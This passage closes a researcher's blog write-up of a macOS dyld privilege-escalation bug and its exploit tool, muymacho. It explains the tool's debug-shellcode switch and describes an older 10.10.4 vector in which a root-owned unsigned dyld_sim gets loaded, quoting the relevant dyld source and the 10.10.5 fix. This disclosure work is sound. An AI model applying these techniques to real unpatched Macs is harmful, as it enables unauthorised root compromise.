This concludes the majority of the post (be sure to check out the super sekret debug shellcode). We’ve discusses a vulnerability from discovery, through potential problems, to exploitation. The complete exploit is on github.
I hope this post has been helpful. It was a fun bug and I very much enjoyed writing muymacho.
Thanks to everyone (Pete Markowsky, Ian Melven, Josha Bronson) that reviewed this post. Also thanks to @iOn1c for posting his challenge which led to finding this bug.
super sekret debug shellcode
Sometimes I am curious as to which segment was used in exploitation as well as the various ASLR addresses. In practice, the actual addresses are irrelevant. I included a debug shellcode that provides this information back to the user.
The super sekret debug shellcode is selected by passing a “-d” command line switch. After muymacho returns with the hashtag symbol (aka #), be sure to type in:
echo "$MUYMACHO"
Feel free to take a look a the debug shellcode in muymacho. Debug information is passed through the execve call in an environment variable.
Appendix
10.10.4 and prior
Mac OS X 10.10.4 and prior have an additional DYLD_ROOT_PATH vector. This section discusses the older vector and 10.10.5 update. OS X 10.10.4 uses dyld.cpp from dyld-353.2.1.
Early in useSimulatorDyld() code, there is a check to verify that dyld_sim is owned by root.
// verify simulator dyld file is owned by root
struct stat sb;
if ( fstat(fd, &sb) == -1 )
return 0;
if ( sb.st_uid != 0 )
return 0;
While auditing the function, it becomes apparent that the code signing requirement is optional. Thus, the only requirement is a root owned non signed dyld_sim which isn’t too high of a barrier. useSimulatorDyld() will gladly load it and execute it.
10.10.5 update
The 10.10.5 update brought fixes for the DYLD_PRINT_FILE vulnerability (CVE-2015-3760 credited to: beist of grayhash, Stefan Esser). It also included changes to useSimulatorDyld() function likely due to the discovery of the previous vector.
dyld_sim no longer needs to be owned by root, however code signing is now mandatory. The following code snippet is from dyld.cpp.
int result = fcntl(fd, F_ADDFILESIGS_FOR_DYLD_SIM, &siginfo);
if ( result == -1 ) {
dyld::log("fcntl(F_ADDFILESIGS_FOR_DYLD_SIM) failed with errno=%d\n", errno);
return 0;
}
A new fcntl command was added in 10.10.5 specifically for dyld_sim. The following excerpt is from /usr/include/sys/fcntl.h.
#define F_ADDFILESIGS_FOR_DYLD_SIM 83 /* Add signature from same file, only if it is signed by Apple (used by dyld for simulator) */
dyld_sim needs to be signed by Apple; a developer certificate is not sufficient.
CVE number
It is somewhat unclear what CVE number this bug has been assigned. The El Capitan security update lists the following bug credited to beist:
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: A memory corruption issue existed in dyld. This was addressed through improved memory handling.
CVE-ID
CVE-2015-5876 : beist of grayhash
The same CVE is also listed on the iOS 9 and watchOS 2 update. A cursory examination of dyld from iOS 8.4.1 did not reveal the same vulnerability muymacho exploits. I could be mistaken and will update this post if that is the case.